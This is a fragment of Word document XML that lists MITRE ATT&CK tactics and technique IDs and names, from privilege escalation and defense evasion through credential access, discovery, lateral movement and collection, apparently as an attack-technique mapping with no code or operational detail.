      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD84D88"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1055.012', 'T1574.002', 'T1574.001', 'T1053.005', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E232855"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T1055.012 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Process Injection&gt;:Process Hollowing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF1B20"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455050B9"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T1574.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Search Order Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535A897"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66918B76" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="006152F1" w:rsidRDefault="006152F1" w:rsidP="00556E97">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="72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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A00934"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1070.003', 'T1553.002', 'T1218.004', 'T1036.003', 'T1036', 'T1036.005', 'T1140', 'T1027', 'T1070.004', 'T1055.012', 'T1574.002', 'T1574.001', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8DF9D7"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T1070.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:Clear Command History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B680F4" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="006621ED" w:rsidRDefault="006152F1" w:rsidP="00556E97">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006621ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1553.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006621ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7DCDEE"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T1218.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>InstallUtil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="285213A1"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T1036.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Rename System Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC7DE1A"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1036 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A08ABF"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621ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006621ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7B29A"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r w:rsidRPr="005F0E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F0E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F0E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F0E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F0E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478BA964"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r w:rsidRPr="005F0E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F0E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F0E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE4D4D"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781852FE"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T1055.012 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Process Injection&gt;:Process Hollowing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5834DA2D"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475254">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00475254">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA2CC95"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T1574.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Search Order Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468F60F9"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0587F937"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1003.003', 'T1003.004', 'T1056.001', 'T1003.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7074C4"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T1003.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:NTDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C6F7A"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T1003.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSA Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D60DA"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C97A9E"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T1003.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:Security Account Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3471B6B2"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1083', 'T1087.002', 'T1046', 'T1018', 'T1049', 'T1016']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097AA674"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1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4150772C"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T1087.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F8B451" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="00DA7544" w:rsidRDefault="006152F1" w:rsidP="00556E97">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1046 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2A5F64"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lastRenderedPageBreak/>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1018 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9A629C" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="00DA7544" w:rsidRDefault="006152F1" w:rsidP="00556E97">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC5C800"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r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA7544">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01966CDD"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1210', 'T1021.004', 'T1021.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB0AFE"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1210 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation of Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2841684D"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T1021.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704B0F85"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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9F660E"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1119', 'T1074.002', 'T1056.001', 'T1005', 'T1560', 'T1039', 'T1560.001', 'T1074.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201AE534"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1119 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D7C59F"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T1074.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Staged&gt;:Remote Data Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC53469"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A787D35"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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6824CE"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1560 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Archive Collected Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1558E8C7"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1039 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Network Shared Drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6CA2D"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T1560.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6D672"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T1074.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Staged&gt;:Local Data Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BDB2CD"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1568.001', 'T1090.002', 'T1105']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28811EB7"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T1568.001 :</w:t>
